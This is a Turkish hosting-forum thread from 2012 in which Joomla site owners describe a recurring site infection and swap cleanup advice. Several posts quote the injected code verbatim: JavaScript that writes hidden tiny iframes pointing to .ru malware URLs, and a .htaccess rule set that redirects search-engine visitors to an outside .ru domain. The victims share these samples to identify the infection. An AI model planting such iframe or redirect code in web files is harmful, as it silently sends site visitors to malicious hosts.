PDA

Orijinalini görmek için tıklayınız : Son Günlerde İframe Vürüsü İle Başı Dertte Olanlar



hugeboss
17-07-2012, 16:55
Merhabalar arkadaşlar.

Son bir aydır sürekli siteleirme iframe vürüsü bulaşıyor ben temizledikçe onlar geli geliyor. İlk Başta htacces dosyasını değiştiriyordu onu hallettim şimdide sitede garip garip yerlere giriyor. Hem hostun hemde joomlanın admin şifrelerini değiştiriyorum ama nedip edip giriyor hiçbişi anlamadım..

İlk başlarda htacces dosyasına bulaşıyodu ve domaine tıklandığında google.nl adresine yönleniyodu site. Şimdide java dosyalarına bulaşıyor. purplebeetle.ru/in.cgi?16 <<< yönlendirilen url bu urlyi adres satırına yazıp enter denildiğinde bing.com'a yönleniyor..

Bu sorun ile karşılaşan başka kişilerde varmı acaba ? varsa çözüm bulabildilermi ?

Herkese iyi çalışmalar dilerim.

mhusty
17-07-2012, 17:09
aynı sorunu bende yaşıyorum uzun süredir ve çıldırma derecesine kadar geldim.. Ben siteyi kuruyorum onlar bozuyor ben kuruyorum onlar bozuyor Sanırım Joomla! ile ilgili bir açık bulmuşlar belkide biz açık veriyoruzdur sitede ama gerçekten bunlar yüzünden web masterlıktan soğuyorum...

mhusty
17-07-2012, 17:12
birde google.nl ' ye yönleniyor site iyi deli oluyorm

mhusty
17-07-2012, 17:17
şuan virüsün sebebinin bilgisayarımdan kaynaklandığını düşünerek yedekleme yapıp formatlıyacağım..Gerçekten çözüm bulan var ise yardımlarını bende bekliyorum

angelaus
17-07-2012, 17:17
aynı siteyi temizle va başka hosta taşı. domaini yönlendir. bak bakalım aynı sorun olacak mı. olursa kulllandığın eklentilerin birinde problem vardır. yoksa sunucun sıkıntılıdır

hugeboss
17-07-2012, 17:22
hocam bende aynen dediğiniz gibi acaba pc demi sorun var dedim ve formatladım daha sonra tekrar siteleri temizledim ve şifreleri değiştim.. ama bugün gene aynı şey oldu.. aynen dediğiniz gibi joomlada sağlam bir açık var gibi ve nette konuyu açmadan önce arattım tek bi konu bilene açılmamış bu iframe virüsü ile alakalı sanırım henüz çok yeni bi açık yada tam ortalığı sarmadı.. ben nerdeyse 1 aydır uğraşıyorum. Ciddi bir güvenlik önlemi alınmalı buna..

Haa birde hocam ben daha sonradan fark ettim hostun ana dizininede "d" <<< adında bir dosya atıyor aynı iframe vürüsü ordada var joomla dosyaları haricinde hostunuzun ana dizininede bir bakın..

angelaus
17-07-2012, 17:26
joomlada açık yok. bunu unutun.

ya eklentilerinizde ya da sunucunuzda açık vardır

hugeboss
17-07-2012, 17:27
Bulaşan İframe Virüs Kodu:



/*c3284d*/
document.write('<iframe src="http://purplebeetle.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/

mhusty
17-07-2012, 17:31
ali abi haklı , ama neden sadece joomla sitelerimde oluyor bu.. Aynı hostta 50'ye yakın Opencart sitem var 5'e yakın WP sitem var bunlarda birşey olmuyor ama Joomla! sitelerimin hepsine virüs bulaşıyor garip birşey..

Ümit
17-07-2012, 19:57
Kullanılan 3.parti eklentiler ve temalar harici joomla çekirdek yapısı için "virüs" , "iFrame virüsü" vb. gibi kelimelerin kullanılması bile gereksizdir. Joomla 100-1000-10000 site de değil yüz binlerce site de kullanılıyor. Joomla çekirdek yapısı dahilinde bu kadar önemli bile olmayan en ufak bir sorun olsa, kimileri 3 günde! yeni sürüm çıkarıyor diye şikayet etse de Joomla çekirdek yapısında böyle bir hataya izin vermez yeni sürüm çıkararak kullanıcılarına zarar verilmesini engeller.

Format attım, sildim yine aynen devam ediyor diyen arkadaşlar;
Joomla 'yı aynı sunucu üzerine joomla.gen.tr (http://forum.joomla.gen.tr/joomla.gen.tr/joomla-indir) 'den veya joomla.org 'dan indireceğiniz kurulum dosyaları ile kurun ve aynı sonucu almayı bekleyin. (Ne eklenti, ne de tema vs. yüklemeyin.) Bu yöntem ile sorunun sunucu veya bilgisayarınız ile mi yoksa 3. parti eklentiler veya temalar ile mi ilgili olduğunu öğrenin. Yöntemi denediğiniz halde sorun devam ediyorsa başka bir sunucu üzerinde deneyin. (Joomla için ücretsiz hosting servisi sağlayan yerleri deneyebilirsiniz) Bu defa da sorun devam ediyorsa format sizin için güvenli bir çözüm olacaktır.

+++++
Ücretli eklenti ve temaların warez sürümlerini kullanmaktan kaynaklanır.
Daha önceleri HTML etiketleri içinde görünen sorunlu kodlar, şimdiler de Javascript kodları içine gömülü olduğundan pasif kullanıcının fark etmesi zorlaştırılmıştır.
Kullanılmak istene eklentilerin son kontrolünü yapmayı unutmayalım. Bkn. http://joomla.gen.tr/yazar-kosesi/211-joomla-guvenli-olmayan-eklentiler

mhusty
18-07-2012, 01:31
valla şuan pc'yi formatladım tertemiz hale getirdim.. Para verip antivirüs programı ladım Son sürüm lisanslı antivirüs programınıda kurdum . Bakalım sonuçlar ne olacak. Virüslerin bulaştığı dosyaların yazma izninide 444 yaptım. Sonuçları hep beraber göreceğiz. illallah ettirdi bu virüs.

angelaus
18-07-2012, 08:29
musty. yine bulaşırsa temiz halini birde benim sunucuda deneyelim.

Fatih
18-07-2012, 10:34
Plesk panel kullanıyorsanız kısa bir süre önce Plesk açık olduğunu açıkladı ve fix'ini de yayınladı.

KB Parallels (http://kb.parallels.com/en/113321)


Detaylı Bilgi (http://www.webguvenligi.net/plesk-kritik-guvenlik-acigi/)

mhusty
18-07-2012, 13:32
musty. yine bulaşırsa temiz halini birde benim sunucuda deneyelim.

şuan lık bir şey yok ama yine bulaşırsa virüs , senin suunucudada deneyelim..

mhusty
21-07-2012, 01:22
şuan 3 tane ayrı firmanın sunucusunda ki Joomla! sitelerimin bir çoğuna yine virüs bulaştı. Bazılarında sadece 3. parti olarak tema kullandım başka eklenti yok. Acaba başkalarınında başına geliyor mu bu virüs olayı merak ediyorum..

angelaus
21-07-2012, 14:22
bana virüs bulaşanlardan birinin yedeğini yolla sana bir host açayım

hugeboss
23-07-2012, 07:09
şuan 3 tane ayrı firmanın sunucusunda ki Joomla! sitelerimin bir çoğuna yine virüs bulaştı. Bazılarında sadece 3. parti olarak tema kullandım başka eklenti yok. Acaba başkalarınında başına geliyor mu bu virüs olayı merak ediyorum..

Aynen hocam bende de devam ediyor.

Java dosyalarına eklenen virüs kodları:


/*c3284d*/
document.write('<iframe src="http://pinkium.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/


/*c3284d*/
document.write('<iframe src="http://competechart.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
/*/c3284d*/

İllallah ettirdi artık.....

26berk
17-08-2012, 00:36
Merhaba arkadaşlar;


Aynı sorun bende de var. Nasıl kurtulabiliriz bundan? .htaccess dosyasına aşağıdaki kodları atıyor ve sitem google'ye yönleniyor. Ben siliyorum kodları, tekrar yükleniyor. :( htaccess dosyasını silsem nasıl olur sizce?


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|alta vista|msn|netscape|aol|goto|infoseek|mamma|allthew eb|lycos|search|metacrawler|bing|dogpile|facebook| twitter|blog|live|myspace|linkedin|flickr|liveinte rnet|filesearch|yell|openstat|gigablast|entireweb| amfibi|dmoz|yippy|search|walhello|webcrawler|jayde |findwhat|teoma|euroseek|wisenut|about|thunderston e|ixquick|terra|lookle|metaeureka|searchspot|slide r|topseven|allthesites|libero|clickey|galaxy|brain ysearch|pocketflier|verygoodsearch|bellnet|freenet |fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ Google (http://azuredisk.ru/constitute?8) [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ Google (http://azuredisk.ru/constitute?8) [R=301,L]
</IfModule>

Fatih
17-08-2012, 01:09
Site yedeğiniz varsa eski yedeklerinizden .htaccess silin tekrar dosyayı yükleyin ftp programınızı kaldırın bilgisayarınızı virüs taraması yapın önerim nod32 smart security, sitelerinizin tüm şifrelerini değiştirin.ftp programına şifrelerinizi kaydetmeyin.Mümkünse daha sağlam olması açısından bilgisayarınıza format atın.Kesinlikle warez programlardan kaçının ftp programı, antivürüs, scriptler.

İşlem Sırası

Antivürüs Kurun.( tarama yapın )
Tüm şifreleriniz değiştirin.
Sunucu güvenliği için hizmet aldığınız firma ile görüşün.
Eski .htaccess dosyanızı yükleyin.

Geçmiş olsun.

egitimci-
17-08-2012, 04:03
ben hosting şirketini değiştirdiğimden beri hiçbir sorun yaşamıyorum . bu virüslerin nedeni tahminimce hosting şirketidir (yeterince güvenlik önlemi almadığı veya lisanslı yazılım kullanmadıği vb. durumlardan dolayı)

Güneydoğu anadoluda site yapıyorum burası hacker ve bozguncu dolu. 1. önceliğim güvenlik. siyasi aşırı sol ve aşırı sağ siteleri de yaptım ve dünyanın her yerinden sitelere saldırı olduğunu google analizden öğrenebiliyorum. hatta yaptığım güzellik salonu sitesi bile bazı hacker guruplardan tehdit içeren yorumlar aldı(güzellik salonlarının Türk - İslam sentezi ile bağdaşmadığı konusunda)
Şu an bir sorun yok. inşallah da olmaz.